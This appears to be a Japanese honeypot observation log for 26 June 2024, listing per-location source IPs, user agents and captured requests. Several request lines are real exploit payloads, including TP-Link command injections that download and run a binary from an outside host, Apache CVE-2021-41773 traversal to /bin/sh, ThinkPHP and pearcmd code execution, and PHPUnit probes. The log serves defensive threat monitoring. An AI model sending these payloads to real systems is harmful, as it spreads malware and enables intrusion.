2024/06/26 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2024/06/26分です。

特徴

共通

TP-Link製品の脆弱性を狙うアクセス
CensysInspectによるスキャン行為
curlによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為

Location:JP

Nmap Scripting Engineによるスキャン行為
/.gitへのスキャン行為

を確認しました。

Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
/.gitへのスキャン行為
Gh0stRATのような動き

を確認しました。

Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Gh0stRATのような動き

を確認しました。

Location:SG

GPONルータの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
/.gitへのスキャン行為
WordPress Pluginへのスキャン行為
configファイルへのスキャン行為

を確認しました。

他

アクセス数推移

JP：総アクセス数：108 (前日比：-519)
US：総アクセス数：190 (前日比：-105)
UK：総アクセス数：210 (前日比：-169)
SG：総アクセス数：176 (前日比：-184)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
4	5.183.103.248	United States
1	20.225.3.88	United States
1	40.83.134.151	United States
1	45.32.155.206	United States
1	45.79.181.179	United States
2	45.83.31.37	Netherlands
1	47.239.15.226	United States
1	52.157.1.91	United States
1	64.62.197.79	United States
1	64.62.197.80	United States
1	64.62.197.85	United States
1	80.82.78.39	United Kingdom
1	91.92.246.103	Bulgaria
10	101.32.192.203	Singapore
1	103.67.163.101	private ip address
1	104.192.0.61	United States
5	104.234.204.106	Canada
3	118.123.105.86	China
21	121.37.158.131	China
2	134.122.21.52	United States
4	135.125.217.54	France
3	135.125.244.48	France
6	135.125.246.110	France
1	139.59.127.9	Singapore
1	143.110.160.131	United States
2	149.248.12.169	United States
2	185.191.127.212	Seychelles
4	185.254.196.173	Ukraine
4	185.254.196.186	Ukraine
2	198.235.24.84	United States
2	198.235.24.139	United States
1	206.168.34.60	United States
13	206.189.79.118	United States
3	222.186.13.132	China

UserAgent一覧

件数	UserAgent
13	`-`
7	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; Android 4.3; SPH-L710 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.99 Mobile Safari/537.36`
6	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0`
26	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
6	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
21	`Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) CriOS/67.0.3396.69 Mobile/16A366 Safari/604.1`
2	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
1	`curl/7.75.0`
1	`curl/8.1.2`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_18.179.20.5_80\n`
1		`\x16\x03\x01\x01\xfa\x01`
10		`\x16\x03\x01`
2	CONNECT	`example[.]com:443`	HTTP/1.1
26	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
2	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
2	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103[.]149[.]28[.]141%2Ft+-O-+\|+sh%60)`	HTTP/1.1
1	GET	`/cluster/cluster/`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
7	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/nmaplowercheck1719302580`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
3	GET	`/robots.txt`	HTTP/1.1
2	GET	`/sendgrid/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/v3/time`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
2	GET	`http[:]//example[.]com/`	HTTP/1.1
10	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	HIIJ	`/`	HTTP/1.1
11	OPTIONS	`/`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
3	PROPFIND	`/`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	4.156.21.142	United States
1	4.255.100.177	United States
4	5.183.103.248	United States
1	13.83.41.194	United States
1	27.43.206.198	China
1	36.156.22.4	China
1	45.33.80.243	United States
1	45.79.128.205	United States
2	45.79.181.104	United States
10	45.148.10.174	Romania
6	54.36.115.221	France
1	57.151.68.21	Switzerland
1	64.23.138.89	United States
1	66.175.213.4	United States
1	66.240.205.34	United States
2	78.153.140.179	Russia
2	78.153.140.222	Russia
2	78.153.140.223	Russia
1	80.66.83.187	Russia
1	80.82.78.39	United Kingdom
2	83.97.73.245	Germany
1	91.92.246.103	Bulgaria
2	101.36.97.172	Hong Kong
1	115.231.78.12	China
1	117.254.32.148	India
3	119.237.202.53	Hong Kong
1	134.122.21.52	United States
1	139.59.101.104	Singapore
2	141.98.11.79	Lithuania
22	141.98.83.197	Panama
1	142.93.187.101	United States
2	143.198.204.194	United States
8	157.230.45.135	United States
22	157.254.55.202	United States
1	162.220.162.210	United States
3	164.52.25.202	China
1	164.90.170.137	United States
1	164.90.174.244	United States
2	165.22.54.194	United States
1	165.232.100.147	United States
2	167.71.197.10	United States
4	167.71.201.139	United States
2	167.71.202.190	United States
4	167.71.207.184	United States
2	167.94.138.54	United States
13	170.64.185.113	United States
1	172.104.11.4	United States
1	172.104.11.34	United States
1	172.105.128.13	United States
1	172.206.147.173	United Kingdom
3	184.105.139.69	United States
1	184.105.247.196	United States
1	185.170.144.3	Estonia
25	185.191.127.212	Seychelles
1	192.155.90.118	United States
2	198.235.24.149	United States
2	199.45.155.85	United States
2	206.168.34.44	United States
3	222.186.13.132	China

UserAgent一覧

件数	UserAgent
52	`-`
22	`Custom-AsyncHttpClient`
63	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; U; Android 8.1.0; zh-CN; Mi Note 3 Build/OPM1.171019.019) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.5.9.1039 Mobile Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
1	`Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36`
10	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
4	`Mozilla/5.0 zgrab/0.x`
14	`Mozilla/5.0`
1	`curl/8.1.2`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`Gh0st\xad`
1		`MGLNDD_34.68.118.83_80\n`
1		`\x03`
1		`\x16\x03\x01\x01H\x01`
2		`\x16\x03\x01\x01\b\x01`
12		`\x16\x03\x01\x01\x07\x01`
1		`\x16\x03\x01\x01\xfb\x01`
2		`\x16\x03\x01\x02`
20		`\x16\x03\x01`
1		``
2	CONNECT	`example[.]com:443`	HTTP/1.1
2	CONNECT	`google[.]com:443`	HTTP/1.1
3	CONNECT	`one[.]one[.]one[.]one:80`	HTTP/1.1
10	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
13	GET	`/cdn-cgi/trace`	HTTP/1.1
17	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45[.]148[.]10[.]78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60)`	HTTP/1.1
15	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60)`	HTTP/1.1
25	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103[.]149[.]28[.]141%2Ft+-O-+\|+sh%60)`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
10	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/vendor/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/LICENSE/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`http[:]//example[.]com/`	HTTP/1.1
2	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
3	PRI	`*`	HTTP/2.0
1	t3	`12.1.2\n`

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
4	5.183.103.248	United States
1	23.94.160.132	United States
43	36.112.137.229	China
26	36.156.22.4	China
1	40.78.88.213	United States
1	45.79.181.94	United States
1	45.79.181.104	United States
8	45.148.10.174	Romania
1	46.101.206.191	United States
1	51.8.223.171	Germany
11	54.36.115.221	France
4	54.37.79.75	France
1	64.62.156.113	United States
1	64.62.156.115	United States
1	64.62.156.118	United States
13	64.225.67.87	United States
1	65.49.1.43	United States
1	66.240.205.34	United States
1	78.153.140.177	Russia
2	78.153.140.179	Russia
2	78.153.140.224	Russia
4	80.82.77.139	United Kingdom
2	83.97.73.245	Germany
1	87.247.158.7	Russia
1	87.247.158.23	Russia
1	103.67.163.199	private ip address
2	104.28.247.220	United States
1	117.211.236.16	India
1	117.248.171.78	India
3	119.237.202.53	Hong Kong
3	134.122.21.52	United States
1	139.59.101.104	Singapore
2	141.98.11.79	Lithuania
15	141.98.83.197	Panama
2	147.185.132.42	United States
2	157.230.37.129	United States
3	161.35.22.53	United States
2	167.71.201.103	United States
2	167.71.207.184	United States
1	167.172.100.107	United States
1	172.104.11.34	United States
1	172.105.128.12	United States
1	172.105.128.13	United States
1	172.168.41.85	United States
2	179.60.147.13	Belize
1	179.150.81.130	Brazil
18	185.191.127.212	Seychelles
1	192.99.7.195	Canada
1	192.155.90.118	United States
2	198.235.24.17	United States
2	206.168.34.116	United States
2	206.168.34.220	United States
1	206.189.30.55	United States
1	207.154.226.49	United States
1	211.233.24.7	South Korea

UserAgent一覧

件数	UserAgent
69	`-`
43	`Custom-AsyncHttpClient`
50	`Go-http-client/1.1`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 SE 2.X MetaSr 1.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
19	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20`
2	`Mozilla/5.0 zgrab/0.x`
8	`Mozilla/5.0`
1	`curl/8.1.2`
1	`python-requests/2.26.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`Gh0st\xad`
1		`MGLNDD_132.145.66.34_80\n`
4		`\x03`
3		`\x16\x03\x01\x01\x07\x01`
1		`\x16\x03\x01\x01\x9e\x01`
2		`\x16\x03\x01\x01\xa8\x01`
1		`\x16\x03\x01\x01\xb5\x01`
1		`\x16\x03\x01\x01\xfc\x01`
37		`\x16\x03\x01`
1		`\x16\x03\x02\x01\x9b\x01`
1		`\x16\x03\x03\x01I\x01`
1		`\x16\x03\x03\x01W\x01`
1		`\x16\x03\x03\x01\x9a\x01`
2		`\x16\x03\x03\x01\xa6\x01`
2	CONNECT	`example[.]com:443`	HTTP/1.1
2	CONNECT	`google[.]com:443`	HTTP/1.1
3	CONNECT	`one[.]one[.]one[.]one:80`	HTTP/1.1
20	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
1	GET	`/boaform/admin/formLogin?username=user&psd=user`	HTTP/1.0
1	GET	`/bundle.js`	HTTP/1.1
7	GET	`/cdn-cgi/trace`	HTTP/1.1
12	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45[.]148[.]10[.]78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60)`	HTTP/1.1
11	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60)`	HTTP/1.1
18	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103[.]149[.]28[.]141%2Ft+-O-+\|+sh%60)`	HTTP/1.1
1	GET	`/cluster/cluster/`	HTTP/1.1
1	GET	`/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/index.php?lang=../../../../../../../../tmp/index1`	HTTP/1.1
1	GET	`/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php`	HTTP/1.1
1	GET	`/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello`	HTTP/1.1
1	GET	`/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/query?q=SHOW+DIAGNOSTICS`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/vendor/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/LICENSE/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`http[:]//example[.]com/`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
4	5.183.103.248	United States
11	45.8.19.27	Netherlands
1	45.33.80.243	United States
1	45.79.181.94	United States
1	45.79.181.104	United States
1	45.79.181.179	United States
1	45.79.181.223	United States
8	45.148.10.174	Romania
1	51.8.217.167	Germany
7	54.36.115.221	France
7	57.129.23.166	France
1	57.152.56.31	Switzerland
1	64.62.197.139	United States
1	64.62.197.144	United States
1	64.62.197.148	United States
1	82.180.144.55	Germany
2	83.97.73.245	Germany
2	83.97.112.53	Germany
1	87.251.64.11	Russia
1	91.92.246.103	Bulgaria
1	91.92.247.109	Bulgaria
30	95.142.121.17	Slovakia
1	104.248.168.64	United States
1	106.75.165.113	China
1	106.75.175.181	China
1	117.235.12.180	India
4	118.194.251.246	Hong Kong
3	119.237.202.53	Hong Kong
2	134.122.21.52	United States
2	141.98.11.79	Lithuania
19	141.98.83.197	Panama
13	143.110.213.183	United States
2	167.71.201.103	United States
4	167.71.202.190	United States
2	167.71.207.184	United States
1	172.104.11.4	United States
1	172.104.11.51	United States
1	172.105.128.11	United States
1	172.202.155.127	United Kingdom
1	184.105.139.67	United States
1	185.170.144.3	Estonia
1	185.180.140.6	Portugal
21	185.191.127.212	Seychelles
1	192.155.90.220	United States
1	194.165.16.76	Panama
2	198.235.24.149	United States
2	198.235.24.197	United States
2	206.168.34.193	United States

UserAgent一覧

件数	UserAgent
34	`-`
56	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G930A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
25	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
